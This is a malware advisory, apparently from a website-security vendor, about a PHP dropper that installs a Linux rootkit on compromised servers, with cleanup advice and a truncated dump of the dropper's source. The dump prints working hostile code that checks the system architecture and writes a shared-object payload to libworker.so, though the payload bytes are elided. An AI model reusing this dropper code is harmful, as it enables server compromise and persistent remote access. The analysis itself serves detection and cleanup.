Droppers are specially crafted PHP scripts which payload is to download (drop) a second malicious file and execute it. The dropped file can be a backdoor, hacktool, defacement or spam-seo related malware.
This PHP code execute several system commands to download and run a Linux rootkit. This rootkit is a malicious program that allows the attacker to maintain remote access to the server and execute remote commands.
Affecting
Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.
Cleanup
Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for parts of the dump below inside your site's files and also checking for unknown daemonised perl process.
You can also sign up with us and let our team remove the malware for you.
Dump
<?php
header("Content-type: text/plain");
if (! function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (! $f)
return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
$so32 = "......."
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
print "Arch is ".$arch."n";
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
$n = unpack("C*", fread($f, 8));
$so[7] = sprintf("%c", $n[8]);
print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."n";
fclose($f);
}
print "SO dumped ".file_put_contents("./libworker.so", $so)."n";
if (getenv("MAYHEM_DEBUG"))
exit(0);